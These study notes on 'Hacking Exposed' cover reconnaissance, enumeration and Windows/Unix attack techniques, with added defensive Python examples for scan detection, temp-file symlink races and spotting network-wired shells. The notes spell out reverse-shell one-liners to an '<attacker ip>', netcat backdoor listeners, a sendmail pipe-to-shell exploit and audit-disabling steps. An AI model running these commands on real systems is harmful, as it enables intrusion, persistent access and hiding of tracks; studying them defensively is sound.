Hacking Exposed Notes

Footprinting – profiling an organization's Internet, Intranet, Remote Access, and Extranet presence to determine security posture and netblocks

Website Pilfering – grabbing source code to analyze offline
  Unix – Wget http://www.gnu.org/software/wget/wget.html
  Win – Teleport Pro http://www.tenmax.com/teleport/home.htm

Search Engines – tools for searching multiple engines, IRC, email, etc. at once
  Win – FerretPRO ($) http://www.ferretsoft.com
  Web – DogPile http://www.dogpile.com

Registered Networks – Internet whois searches
  Current Registrars http://www.internic.net/alpha.html
  Unix – Whois, Xwhois http://c64.org/~nr/xwhois/
  Unix – $ whois "acme."@whois.crsnic.net (list possible domains)
  Unix – $ whois "HANDLE JS1234"@whois.networksolutions.com (list POC info)
  Unix – $ whois "@acme.net"@whois.networksolutions.net (list email info)
  Web – US http://www.arin.net
  Web – International http://www.allwhois.com
  Web – US Military http://whois.nic.mil
  Web – US Gov http://whois.nic.gov

DNS Interrogation – zone transfers between primary and secondary
  Unix – $ nslookup
         > server x.x.x.x
         > set type=any
         > ls -d Acme.net. >> /tmp/zone_out
  Unix – $ host -l -v -t any Acme.net
  Unix – $ host Acme.net (resolves Mail Exchange records)
  Unix – axfr http://ftp.cdit.edu.cn/pub/linux/www.trinux.org/src/netmap/axfr-0.5.2.tar.gz
  Win – Sam Spade http://www.samspade.org

Network Reconnaissance – determine the path to the network (access path diagram)
  Unix – $ traceroute -S -p53 x.x.x.x (the -p option lets you specify the port to start at, which is then incremented by one per probe; the -S option stops incrementing once an open port is found)
         Requires patch http://www.packetfactory.net/Projects/firewalk/traceroute.diff
  Unix – traceroute option -I uses ICMP packets; the default is UDP
  Win – tracert (CLI)
  Win – VisualRoute http://www.visualroute.com , NeoTrace http://www.neotrace.com (GUI)
  Counter Measure – log incoming traceroutes and send back false data
         RotoRouter http://packetstorm.securify.com/UNIX/loggers/rr-1.0.tgz

Scanning – determine systems that are alive and reachable via sweeps, port scans, and discovery tools

Ping Sweeps – sending out ICMP ECHO (type 8) across ranges
  Unix – fping http://packetstorm.securify.com/Exploit_Code_Archive/fping.tar.gz
  Unix – nmap, use the -sP option and a valid net range; -PT<#> allows you to try other ports if ICMP is blocked
  Unix – Hping http://www.kyuzz.org/antirez/ allows you to send fragmented packets (-f)
  Unix – icmpenum http://www.nmrc.org/files/sunix/icmpenum-1.1.1.tgz can use ICMP TIME STAMP REQUEST and ICMP INFO when ECHO is blocked, spoof packets with the -s option, and passively listen with the -p option
  Win – Pinger http://www.nmrc.org/files/snt/
  Win – Ping Sweep http://www.solarwinds.net
  Additional Tools
  Unix – Loki2 http://www.phrack.org/show.php?p=51&a=6 wraps data in ICMP packets, used to bypass firewalls and install backdoors

Port Scanning – connecting to TCP and UDP ports on a target system to see which services are running and which OS
  TCP connect scan – full three-way handshake, easily detected by host or NIDS
  TCP SYN scan – no ACK is sent, only RST/ACK, so that no connection is made; stealthier
  TCP Xmas Tree Scan – uses FIN, URG, PUSH packets to receive RST for closed ports
  TCP Null Scan – sends a packet with no flags to receive RST for closed ports
  TCP ACK Scan – used to map firewall rulesets, determine statefulness
  TCP Window Scan – analyzes TCP window size for OS identification and open ports
  TCP RPC Scan – Unix, detects RPC ports and the associated program
  UDP Scan – looks for ICMP port unreachable; less accurate, slower
  Unix – Strobe ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/strobe-1.06.tgz TCP scanner, also grabs banners
  Unix – Saint (SATAN) http://www.saintcorporation.com/products/download.html UDP scanner
  Unix – netcat http://www.saintcorporation.com/products/download.html Multifunction scanner
  Unix – nmap, -D option for decoy scan, -I option shows the owner of the service (root), -b ftp bounce
  Win – SuperScan http://www.foundstone.com/resources/proddesc/superscan4.htm
  FTP Bounce Scanning – allows an attacker to put/get data via a 3rd-party server that is trusted by the target host. Requires the PORT command and a writable directory on the system http://www.securityfocus.com/archive/1/3488

Scan Detection
  Unix – Snort http://www.snort.org/docs/ open source NIDS
  Unix – scanlogd http://www.openwall.com/scanlogd/ host-based logging
  Unix – PortSentry http://sourceforge.net/projects/sentrytools/ host-based, detects and blocks
  Unix – alert.sh http://www.spitzner.net/intrusion.html firewall scan detection
  Win – Genius 3.2.3 http://www.indiesoft.com/ Windows host-based scan detection

OS Determination – using techniques such as banner grabbing, port scanning, and stack fingerprinting to determine the target host's operating system

Stack Fingerprinting – analyzing the target machine's TCP/IP stack for OS-specific signatures. Each vendor implements the TCP/IP stack slightly differently.
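The scan techniques and host-based detectors (scanlogd, PortSentry) listed above are easier to reason about with a small detector in hand. The following is an added Python example, not from the book or any of the tools named here: it classifies each probe by its TCP flags (SYN, Xmas, Null, FIN, ACK), then raises one alert per source when a burst of distinct ports is hit inside a short window. The log format and the sample lines are constructed for this example, and the 7-ports-in-3-seconds threshold is an assumed scanlogd-style default, not a value from the notes.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format for this example (not any real product's):
# "<ISO-8601 time> <src ip> <dst ip> <tcp|udp> <dst port> <tcp flags or ->"
# Flags are one letter each: S=SYN A=ACK F=FIN P=PSH U=URG R=RST; "-" = none.
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (tcp|udp) (\d+) (\S+)$")

SAMPLE_LOG = """\
2003-06-01T10:00:00 192.0.2.7 198.51.100.10 tcp 21 S
2003-06-01T10:00:00 192.0.2.7 198.51.100.10 tcp 22 S
2003-06-01T10:00:00 192.0.2.7 198.51.100.10 tcp 23 S
2003-06-01T10:00:01 192.0.2.7 198.51.100.10 tcp 25 S
2003-06-01T10:00:01 192.0.2.7 198.51.100.10 tcp 53 S
2003-06-01T10:00:01 192.0.2.7 198.51.100.10 tcp 80 S
2003-06-01T10:00:02 192.0.2.7 198.51.100.10 tcp 110 S
2003-06-01T10:00:02 192.0.2.7 198.51.100.10 tcp 139 S
2003-06-01T10:00:05 198.51.100.4 198.51.100.10 tcp 80 S
2003-06-01T10:00:06 198.51.100.4 198.51.100.10 tcp 443 S
2003-06-01T10:00:09 203.0.113.9 198.51.100.10 tcp 22 FPU
2003-06-01T10:00:10 203.0.113.9 198.51.100.10 tcp 25 -
2003-06-01T10:00:30 192.0.2.8 198.51.100.10 tcp 80 S
2003-06-01T10:00:45 192.0.2.8 198.51.100.10 tcp 443 S
2003-06-01T10:01:00 192.0.2.8 198.51.100.10 tcp 8080 S
"""

def classify(proto, flags):
    """Name the scan technique (from the list above) a single probe is consistent with."""
    if proto == "udp":
        return "UDP"
    f = set(flags) - {"-"}
    if not f:
        return "NULL"    # no flags at all: TCP Null scan
    if {"F", "P", "U"} <= f:
        return "XMAS"    # FIN+URG+PSH: Xmas Tree scan
    if f == {"S"}:
        return "SYN"     # half-open SYN scan (a full connect scan starts the same way)
    if f == {"F"}:
        return "FIN"
    if f == {"A"}:
        return "ACK"     # ruleset mapping
    return "OTHER"

def parse(lines):
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue     # skip lines that do not match the expected format
        ts, src, _dst, proto, port, flags = m.groups()
        yield datetime.fromisoformat(ts), src, int(port), classify(proto, flags)

# Probe types with no legitimate use on a production network: alert on a single packet.
ALWAYS_SUSPECT = {"NULL", "XMAS", "FIN"}

def detect_scans(lines, min_ports=7, window=timedelta(seconds=3)):
    """One alert per (source, technique): >= min_ports distinct ports inside `window`
    (assumed scanlogd-style burst threshold), or a single probe of an always-suspect kind."""
    probes = defaultdict(list)                    # (src, kind) -> [(time, port)]
    for ts, src, port, kind in parse(lines):
        probes[(src, kind)].append((ts, port))
    alerts = []
    for (src, kind), evs in probes.items():
        evs.sort()
        need = 1 if kind in ALWAYS_SUSPECT else min_ports
        for i, (start, _) in enumerate(evs):
            ports = {p for t, p in evs[i:] if t - start <= window}
            if len(ports) >= need:
                alerts.append({"src": src, "kind": kind, "ports": sorted(ports)})
                break                             # one alert per source/technique
    return alerts
```

Note that 192.0.2.8 in the sample probes one port every 15 seconds and is never flagged: a fixed burst window is exactly what a slow scan evades, so the window and port count are a trade-off against false positives on busy clients rather than a setting to copy blindly.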
  http://www.insecure.org/nmap/nmap-fingerprinting-article.html
  Passive Stack Fingerprinting – no connections are made; packets captured by a sniffer are analyzed for specific attributes such as TTL, Window Size, and DF (don't fragment bit). The results can be compared to the Siphon fingerprint db http://www.l0t3k.org/security/tools/fingerprinting/

Discovery Tools
  Unix – Cheops http://www.marko.net/cheops/ Linux GUI for network discovery via ping, traceroute, queso
  Unix – Scotty http://wwwhome.cs.utwente.nl/~schoenw/scotty/ discovery tool, includes SNMP

Enumeration – process of extracting valid account and shared resource information for a target host

WINDOWS

Windows Resource Kits – contain useful Windows utilities
  Win2K - http://www.microsoft.com/windows2000/techinfo/reskit/tools/default.asp
        - http://www.dynawell.com/support/ResKit/win2k.asp
  WinNT - http://www.dynawell.com/support/ResKit/winnt.asp

Null Sessions – CIFS/SMB & NetBIOS allow unauthenticated sessions via ports 139 & 445
  Win – C:\>net use \\192.168.202.33\IPC$ "" /u:"" (setting up a null session)
  Win – edit registry key HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
        Must be set to 1 for NT and 2 for W2K to restrict null sessions.
  Read Hobbit's CIFS paper for further info http://www.insecure.org/stf/cifs.txt

Domain Enumeration – use NetBIOS on UDP port 137 to list domains and domain machines
  Win – C:\>net view /domain
        C:\>net view /domain:<domain name> (lists machines on the domain)

NetBIOS Name Tables – grab NetBIOS names remotely
  Win – C:\>nbtstat -A 192.168.202.33
  Win – C:\>nbtscan 192.168.234.0/24 (Unix/Win versions found at http://www.inetcat.org/software/)

Domain Controller Enumeration
  Win – C:\>nltest /dclist:<domain_name> (run over a null session: nltest /server:<server_name>)
        C:\>nltest /trusted_domains

Share Enumeration
  Win – C:\>net view \\<machine_name> (rmtshare, srvinfo [-s] also good, NTRK)
  Win – DumpSec also shows file system permissions and services http://www.somarsoft.com/
  Win – Legion 2.1 http://www.elhacker.net/hacking.htm
  Win – NAT ftp://ftp.technotronic.com/microsoft/nat10bin.zip

Misc Windows Enumeration Tools
  Win – Epdump RPC service/port mappings http://packetstormsecurity.org/NT/audit/epdump.zip
  Win – netviewx lists specific server types like domain controller, RAS, print
        C:\>netviewx -D <domain name> -T <server type>
        http://www.ibt.ku.dk/jesper/NetViewX/default.htm
  Win – Winfo automates null sessions http://www.ntsecurity.nu/toolbox/winfo/
  Win – Nbtdump provides an HTML report http://www.cerberus-infosec.co.uk/toolsn.shtml

SNMP Enumeration
  Win – Snmputil – browses the MIB (Management Information Base) tree using default community strings like public, private. The tree is hierarchical, so each time you "walk up" more information is revealed.
        ".1.3.6.1.4.1.77.1.2.25" is the OID for Microsoft's MIB. (NTRK)
        C:\>snmputil walk 192.168.202.33 public .1.3.6.1.4.1.77.1.2.25
  Win – IP Browser – Solarwinds GUI, http://www.solarwinds.net

More CIFS/SMB Enumeration
  Win – Dumpsec (DumpACL) – uses a null session to get user, group, share, and policy info
  Win – sid2user/user2sid – allow easy conversion of SIDs to usernames and vice versa http://www.chem.mus.su:8080/~rudnyi/NT/sid.txt
        C:\>user2sid \\<IP Address> "domain users" (grabs the machine's SID)
        C:\>sid2user \\<IP Address> 5 21 8915387 1645822062 18198280005 500 (grabs the admin account's user name; note 500 is always the admin RID, even if it's renamed. Also, the first account created is always given an RID of 1000, incremented by one from there)
        Mark Russinovich http://www.win2000mag.com/Articles/Index.cfm?ArticleID=3143
  Win – Enum – CLI utility for enumeration & password guessing http://razor.bindview.com
        C:\>enum -U -d -P -L -c <IP Address>
  Win – Nete from sirdystic of CDC, similar to enum
  Win – UserInfo/UserDump use a Level 3 call on the NetUserGetInfo API http://www.HammerofGod.com/download.htm

LDAP Enumeration
  Win – ldp.exe – Active Directory Administration Tool – connects to an AD server and allows you to browse its contents; runs on either port 389 or 3268 (AD Global Catalog)

Banner Enumeration
  Banner grabbing via telnet or netcat on various ports like 80, 21, 23, 25 will often leak system, OS, application, user, or version information. It is also common to "nudge" the system into coughing up more information using commands like GET / HTTP/1.0, HEAD, QUIT, HELP, ECHO, and sometimes just carriage returns.

Registry Enumeration
  Regdmp (NTRK) or DumpSec (Somarsoft) can both be used to do this; however, by default Win2K Server usually doesn't allow it.
  Review the key HKLM\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths to see what's allowed

UNIX

NFS Enumeration
  Unix – showmount – lists all NFS (port 2049) exported file systems on a machine
        $ showmount -e <IP Address>

NIS Enumeration
  Unix – in general, various NIS client tools can be used to guess the NIS domain name of a server and retrieve NIS maps, which contain valuable information (pscan by Pluvius)

User & Group Enumeration
  Unix – finger (port 79), rwho, rusers all list out who is on the machine at the time. To disable these services, simply edit the inetd.conf file and killall -HUP inetd
  Unix – SMTP – VRFY <user> will confirm the name of a valid user; EXPN <user> will give out the actual mail addresses behind aliases and mailing lists. Just telnet to port 25 to test.
  Unix – tftp – if enabled, may allow you to get the /etc/passwd file.

RPC Enumeration
  Unix – rpcinfo, rpcdump – both list the RPC bindings for all applications running on the box. RPC uses ports 111, 32771. http://www.atstake.com/research/tools/info_gathering/

SNMP Enumeration
  Unix – the net-snmp package will usually include both snmpget and snmpwalk
        $ snmpget <IP Address> public system.sysName.0 (grabs the host name)
        $ snmpwalk <IP Address> public (grabs the entire MIB)

BGP Route Enumeration
  Unix – ASN Queries – an ASN (Autonomous System Number) is a 16-bit integer purchased from ARIN to identify a company on the Internet. Use http://www.completewhois.com/ to search for this info.
        C:\> telnet route-views.Oregon-ix.net (public router)
        > show ip bgp <IP Address> (the last number in the AS Path is the ASN)
        > show ip bgp regexp _<ASN>$ (will give you the public IP space of the company)

Windows NT Hacking – gaining access, escalating privileges and covering tracks on a Windows NT system

Password Guessing
  Default Passwords
        http://packetstormsecurity.org/docs/hack/dad.txt
        http://phenoelit.darklab.org/cgi-bin/display.pl?SUBF=list&SORT=1
        http://www.cirt.net/cgi-bin/passwd.pl
  Null Passwords
  Tools
        NTInfoScan http://packetstormsecurity.org/NT/audit/index2.html
        SMBGrind http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=SMBGrind&type=archives

Password Sniffing
  SMB Packet Capture (readsmb) included with l0phtcrack
  PPTP – Unix-based sniffer that captures VPN credentials (packetstorm)
  Cain & Abel filters out login credentials http://www.oxid.it/

Pass The Hash
  NT only; LSASS allows hash-only authentication http://www.core-sdi.com/papers/nt-cred.htm

Buffer Overflows
  Unexpected input which forces arbitrary code onto the execution stack
        http://www.cultdeadcow.com/cDc_files/cDc-351/page1.html by DilDog
        http://pulhas.org/phrack/55/P55-15.html by Barnaby Jack
        http://www.insecure.org/stf/smashstack.txt by Aleph One

Privilege Escalation
  Hoovering – the process of stealing as much info off the machine as possible with a non-admin account. Srvinfo (NTRK) will enumerate shares and regdmp (NTRK) can probe the registry for info. Also good to script a find command in a batch file to look for the string "password".
  GetAdmin uses DLL injection to add a user into the local admin group (crash4) http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=9231
  Sechole, Secholed escalate privileges of the IUSR_machine_name account on IIS; must be able to upload to an executable directory on the server http://www.winnetmag.com/Article/ArticleID/9269/9269.html
  LPC Spoofing

Password Cracking
  The SAM file may be obtained by booting to an alternate OS, from the repair directory, or by extracting it from the registry via a tool.

Exploiting Trusts
Sniffers

Remote Control & Backdoors
  Remote.exe – from NTRK, gives remote users a CMD shell. The most popular way to start it on the host is to use the AT command (scheduler service). SC.exe – Service Controller will start the scheduler service if it's not running
        C:\> sc \\<ip address> start schedule
        C:\> net time \\<ip address> (to check the time on the remote system)
        C:\> at \\<ip address> 10:40P ""remote /s cmd secret"" (launches server)
        C:\> remote /c <ip address> secret (launches your client)
        C:\> nc -L -d -e cmd.exe -p80 (starts listener on target host)
        C:\> nc <ip address> 80 (connects attacker to target host)
  Netbus – similar to Back Orifice; nbsvr.exe must be started on the target first. Good idea to run in stealth mode by modifying the registry, however most virus scanners will detect it running. Default ports are 12345 and 20034
  Along with these, VNC, NetMeeting, and DameWare are popular GUI-based remote control apps

Port Redirection
  Netcat – "Shell Shoveling": the target listens on one port while sending the output back via a cmd shell to the attacker. The attacker must listen on 2 ports
        $ nc <attacker ip> 80 | cmd.exe | nc <attacker ip> 25 (run on target)
  Fpipe – popular port redirector, also allows for specifying the source port.
        Does have some session timeout issues though with TIME_WAIT and CLOSE_WAIT periods
        C:\>fpipe -v -l 53 -r 23 <ip address> (command to run on target)
        http://www.foundstone.com/resources/proddesc/fpipe.htm

Root Kits – the first Windows rootkit was from Greg Hoglund of rootkit.com. A rootkit is a software suite that substitutes common system binaries with Trojans. Rootkits use a technique known as "function hooking" to redirect calls without altering the executable or binary. The current generation of kernel-level rootkits are very difficult to detect as they are embedded in the OS. http://www.antiserver.it/Backdoor-Rootkit/

Cover Tracks
  Disable Auditing
        C:\> auditpol /disable (NTRK)
  Clear Event Log
  Hiding Files
        C:\> attrib +h [directory] (DOS command)
        NTFS File Streaming will hide data as additional file attributes. It requires the POSIX utility cp (NTRK)
        C:\> cp <file2hide> <existing file>:<file2hide> (just reverse to unhide)

Windows 2000 Hacking – gaining access, escalating privileges and covering tracks on a Windows 2K system

Footprinting
Enumeration
  NetBIOS/SMB – System information will still be leaked unless you do 1 of 2 things. Disabling File and Print Sharing on your outbound interface will prevent null sessions. Set RestrictAnonymous = 2 in either the registry or in the Security Policy Manager.
  Eavesdropping – All authentication sent using legacy LM hashes can be easily cracked via L0phtcrack. Also, Kerberos authentication is not used if the user specifies an IP address instead of a hostname.
  SMBRelay – When trying to connect to a share/server, Windows will automatically try to log in as the current user if no other authentication information is explicitly supplied, before asking the user for a logon/password. SMBRelay conducts a MITM attack by fooling a user into connecting to a rogue server; after capturing the traffic it is relayed to the actual destination and back to the end user.
        http://www.xfocus.net/articles/200305/smbrelay.html

Denial of Service
  New Registry Keys under HKLM\Sys\CCS\Services\Tcpip\Parameters\
        SynAttackProtect = 2 (times out SYN_RECEIVED faster)
        EnableDeadGWDetect = 0 (prevents an attacker from changing the default gw)
        EnablePMTUDiscovery = 0 (stops attackers from lowering the MTU value)
        KeepAliveTime = 300,000 (verifies an idle connection is still intact)
        Interfaces\<int>\NoNameReleaseOnDemand = 0 (stops malware)
        Interfaces\<int>\PerformRouterDiscovery = 0 (stops router spoofing attacks)
  Nbname – This tool puts a host in NetBIOS Name Conflict, effectively stopping all NetBIOS networking on the host. Must first disable NBT on the attacker machine to use the tool.

Privilege Escalation
  NetDDE – the Network Dynamic Data Exchange service allows applications to share data through "trusted shares". It runs as SYSTEM, so arbitrary code can be attached to the request and voila, you're admin. Requires Visual C++.

Pilfering
  EFS Temporary – EFS writes a temp file in plain text before encrypting a new file; a low-level disk editor like diskprobe.exe (RK) can recover the file even after it's deleted because the disk blocks are not overwritten.

Exploiting Trust
  LSA Secrets – lsadump2 still functions on W2K. Microsoft doesn't consider it a problem
  Multimaster Model – Within a Windows 2K forest, all domains replicate a shared Active Directory and trust each other with 2-way transitive trusts necessitated by the Kerberos implementation. Trusts between forests and NT domains are still one-way. This allows for consolidation of domains and delegation of permissions via OUs (organizational units).

Back Doors
Remote Control
  Terminal Services running on 3389; TS allows brute force password guessing even if a lockout policy is set. TS also allows existing connections to be hijacked if the previous user forgot to log out correctly, assuming you have their credentials.
New Stuff
  Group Policy – GPO is a new 2K feature that allows you to configure security parameters in one place to be enforced locally or on the domain. (Gpedit.msc)
  Secedit – Security Configuration and Analysis tool allows admins to audit the local system security for compliance issues. It also allows you to automatically make updates and have them applied immediately.

XP Stuff
  ICF – Internet Connection Firewall offers packet filtering on all inbound traffic, while permitting all outbound traffic.
  Software Restriction Policy allows central control over application security to protect against various forms of malware.
  Built-in support for encrypted wireless networking (802.11).
  MS Passport single-login solution for the Internet, works by using a tamper-resistant cookie for accessing all sites that support MS Passport authentication.
  Credential Management, WPA, Remote Desktop, UPnP

UNIX/Linux Hacking – gaining access, escalating privileges and covering tracks on a *NIX system

Vulnerability Mapping is the process of mapping specific security attributes of a system to an associated vulnerability or potential vulnerability.

Remote Attacks
  Exploit a Listening Service (telnet, ftp, ssh, etc.)
  Route Through a Unix System – circumvent a Unix firewall by source routing your packets through the firewall. Works only if the system has IP forwarding enabled.
  User-Initiated Remote Execution – attacks requiring user interaction, such as browsing malicious web sites or opening email attachments.
  Promiscuous Mode Attacks – crafted packets can exploit your sniffer application

Data Driven Attacks are executed by sending data to an active service that causes unintended or undesirable results.

Buffer Overflow – a condition that occurs when a user or process attempts to place more data into a buffer than was originally allocated. This type of behavior is associated with specific C functions like strcpy, strcat, sprintf etc.
  A buffer overflow condition would normally cause a segmentation violation to occur. When the attack is executed, special assembly code known as the egg is sent to the VRFY command as part of the actual string used to overflow the buffer. When it's overrun, attackers can set the return address of the offending function to point to their arbitrary code's memory address, which usually includes a shell command.
        http://www.piaffe.org/panic/ Hell Kit for writing buffer overflows
  Disable stack execution in /etc/system:
        set noexec_user_stack=1
        set noexec_user_stack_log=1

Heap Overflows are based on overrunning memory that has been dynamically allocated by an application. This differs from stack-based overflows, which depend on overflowing a fixed-length buffer. http://www.w00w00.org/files/heaptut/heaptut.txt

Format String Vulnerability arises from subtle programming errors in the formatted output family of functions, which includes printf() and sprintf(). An attacker can take advantage of this by passing carefully crafted text strings containing formatting directives, which can cause the target computer to execute arbitrary commands. For example, by using printf(buf) instead of printf("%s", buf), the program reads the first argument supplied by the user as the format string, and arbitrary code can follow it.

Input Validation Attacks occur when a program fails to recognize syntactically incorrect input, a module accepts extraneous input, a module fails to handle missing input fields, or a field-value correlation error occurs. Often used to exploit CGI scripts or other web applications.

Shell Access
  X Term, if enabled, is the easiest way to get local GUI access on a machine remotely, but may need to be combined with an exploit.
        $ /usr/X11R6/bin/xterm -ut <ip address>:0.0
  Reverse Telnet/Netcat will both provide attackers with a back channel into the system that originates from the target host. Both require a listener to be running.
        $ /bin/telnet <attacker ip> 80 | /bin/sh | /bin/telnet <attacker ip> 25
        $ nc -e /bin/sh <attacker ip> 80
  TFTP/Anonymous FTP both will allow an attacker to gain access to your machine, and if a writeable/executable directory is available the system is toast. The services themselves may be vulnerable to exploits.

Sendmail – the standard Unix Mail Transfer Agent has been full of vulnerabilities dating back to 1988. Common attacks aside from buffer overflows, input validation, and SMTP enumeration include:
  Pipe Vulnerability which allows a user to escape to a shell after the data portion
        helo
        mail from:
        rcpt to: bounce
        data
        .
        mail from: bin
        rcpt to: |sed '1,/^$/d' | sh
        data
  Forward Vulnerability
        cat > .forward (create a forward file to ftp to the user's home directory)
        |"cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell" (creates shell executable)
        $ echo hello chump | mail
  Refer to http://www.sendmail.org/ for up-to-date information

RPC is a mechanism that allows a program running on one computer to seamlessly execute code on a remote system. Most buffer overflow attacks target RPC services that run as root in order to gain shell access to the target system. Common services exploited include rpc.ttdbserverdb (tooltalk), rpc.cmsd (CDE), rpc.statd (automount), mountd, sadmind, and snmpXdmid.

NFS allows transparent access to files and directories of remote systems as if they were stored locally. Most of the security provided by NFS relates to a data object known as a file handle. The file handle is a token that is used to uniquely identify each file and directory on the remote server. If a file handle can be sniffed or guessed, remote attackers could easily access those files on the remote system.
        $ showmount -e <host> (lists exported file systems & permissions)
        $ mount <host>:/ /mnt

X Window System allows exporting of the local graphical display to remote users. Xscan will scan an entire subnet looking for systems with xhost + enabled and log any console keystrokes to a local logfile. http://www.seguridad0.net/programas/X-Scan-v3.0.zip
        $ xlswins -display <machine>:0.0 (will list out hex IDs for you)
        $ xwatchwin <machine> -w <hex ID> (allows you to observe somebody else's X session)

Promiscuous Mode Attacks are common against Ethereal, tcpdump, and several other sniffers

Symbolic Links can be exploited using any program, especially SUID ones, that creates a temp file and doesn't perform any sanity checking. By linking that tmp file to the /etc/passwd or shadow file, the program will write to the linked file with its own (SUID) permissions rather than the invoking user's.
        $ strings * | grep tmp (when run in /bin or /usr/bin, will list out good programs to target)

File Descriptors are nonnegative integers that the system uses to keep track of files rather than using specific filenames (0, 1, 2 = stdin, stdout, stderr).
  If a file descriptor is opened r/w by a privileged process, it may be possible for the attacker to write to the file while it is being modified. To shell out of vi, execute :!sh and then modify the tmp file or run exploit code.
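The symlink and temp-file weakness described above is easiest to understand by staging it. This is an added Python example, not from the book notes or any tool named here: it sets up a scratch directory standing in for /tmp and a file standing in for /etc/passwd, shows the careless open() following a pre-planted symlink, and then shows the two hardened forms a program author should use (O_EXCL|O_NOFOLLOW on a fixed name, and mkstemp for an unpredictable name). The file names, contents and function names are constructed for the demo.

```python
import errno
import os
import tempfile

# Added example, not from the book notes. A privileged program that blindly opens a
# predictable temp file name follows a symlink an attacker planted there and clobbers
# the link's target (the /etc/passwd case described above).

def careless_write(path, data):
    """The vulnerable pattern: open(path, 'w') follows symlinks and truncates the target."""
    with open(path, "w") as f:
        f.write(data)

def careful_write(path, data):
    """Hardened pattern for a fixed name: create atomically, refuse anything that exists.
    O_EXCL makes the create fail if the path already exists (a symlink counts);
    O_NOFOLLOW is belt-and-braces. Mode 0600 keeps other users out of the file."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)

def unpredictable_write(tmpdir, data):
    """Preferred pattern: mkstemp picks a random name and opens it with O_EXCL, so
    there is no predictable path for an attacker to pre-create or link."""
    fd, path = tempfile.mkstemp(dir=tmpdir, prefix="prog.")
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path

def _read(path):
    with open(path) as f:
        return f.read()

def run_demo():
    """Stage the race in a scratch directory (stands in for /tmp and /etc/passwd)."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "passwd")
        with open(target, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")
        # Attacker pre-creates the predictable name as a link to the sensitive file.
        predictable = os.path.join(d, "prog.tmp")
        os.symlink(target, predictable)

        careless_write(predictable, "evil:x:0:0::/:/bin/sh\n")
        clobbered = _read(target)                 # the write went through the link

        try:
            careful_write(predictable, "harmless\n")
            blocked = False
        except OSError as e:                      # EEXIST (or ELOOP): open refused
            blocked = e.errno in (errno.EEXIST, errno.ELOOP)
        after_careful = _read(target)             # unchanged by careful_write

        rnd = unpredictable_write(d, "harmless\n")
        return {
            "clobbered": clobbered,
            "blocked": blocked,
            "after_careful": after_careful,
            "random_name_is_predictable": os.path.basename(rnd) == "prog.tmp",
            "random_file_mode": os.stat(rnd).st_mode & 0o777,
        }

if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```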
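For the Reverse Telnet/Netcat back channels and the netcat "shell shoveling" listed earlier in these notes, a defender's first question is how to spot such a shell on a live host. The following is an added Python example, not from the book or from netcat: it walks the Linux /proc tree (a real layout, assumed present) and flags any shell whose stdin/stdout/stderr is a socket (the nc -e /bin/sh case) or whose stdio pipes are shared with a process holding a socket (the telnet | /bin/sh | telnet case). The shell name list and the SAMPLE_PROCS snapshot are constructed for the example.

```python
import os

# Added example, not from the book notes. Shell names to treat as interesting is an
# assumption for this demo; extend it for the interpreters in use on your hosts.
SHELLS = {"sh", "bash", "dash", "ksh", "zsh", "csh", "tcsh"}

def collect_procs(proc_root="/proc"):
    """Snapshot {pid: {"comm": name, "fds": {fd: link target}}} from a Linux /proc.
    Processes whose fd table is unreadable (other users' when not root) are skipped."""
    procs = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(base, "comm")) as f:
                comm = f.read().strip()
            fds = {}
            for fd in os.listdir(os.path.join(base, "fd")):
                try:
                    fds[int(fd)] = os.readlink(os.path.join(base, "fd", fd))
                except OSError:
                    pass                          # fd closed while we looked
            procs[int(entry)] = {"comm": comm, "fds": fds}
        except OSError:
            continue
    return procs

def _socket_holders(procs):
    return {pid for pid, p in procs.items()
            if any(t.startswith("socket:[") for t in p["fds"].values())}

def find_shoveled_shells(procs):
    """Return [(pid, reason)] for shells whose standard streams are wired to the network."""
    net_pids = _socket_holders(procs)
    findings = []
    for pid, p in procs.items():
        if p["comm"] not in SHELLS:
            continue
        stdio = [p["fds"].get(n, "") for n in (0, 1, 2)]
        if any(t.startswith("socket:[") for t in stdio):
            findings.append((pid, "shell stdio attached directly to a socket"))
            continue
        # Pipeline variant: the shell's stdio pipe inodes also appear in the fd table of
        # a process that owns a socket (telnet/nc on either side of `| /bin/sh |`).
        pipes = {t for t in stdio if t.startswith("pipe:[")}
        peers = sorted(q for q in net_pids
                       if q != pid and pipes & set(procs[q]["fds"].values()))
        if peers:
            findings.append((pid, f"shell stdio piped to network process(es) {peers}"))
    return findings

# Constructed snapshot in the shape collect_procs() returns, covering the three cases.
SAMPLE_PROCS = {
    1200: {"comm": "bash", "fds": {0: "/dev/pts/1", 1: "/dev/pts/1", 2: "/dev/pts/1"}},
    4242: {"comm": "sh", "fds": {0: "socket:[77001]", 1: "socket:[77001]", 2: "socket:[77001]"}},
    5000: {"comm": "telnet", "fds": {0: "/dev/pts/2", 1: "pipe:[9001]", 3: "socket:[77010]"}},
    5001: {"comm": "sh", "fds": {0: "pipe:[9001]", 1: "pipe:[9002]", 2: "/dev/pts/2"}},
    5002: {"comm": "telnet", "fds": {0: "pipe:[9002]", 1: "/dev/pts/2", 3: "socket:[77011]"}},
    6100: {"comm": "sh", "fds": {0: "pipe:[9100]", 1: "/dev/pts/3", 2: "/dev/pts/3"}},
    6101: {"comm": "ls", "fds": {0: "/dev/pts/3", 1: "pipe:[9100]", 2: "/dev/pts/3"}},
}

if __name__ == "__main__":
    snapshot = collect_procs() if os.path.isdir("/proc") else SAMPLE_PROCS
    for pid, why in find_shoveled_shells(snapshot):
        print(pid, why)
```

A legitimate `curl ... | sh` install will trip the pipeline rule too, so treat hits as leads to triage against the parent process and the remote endpoint, not as verdicts.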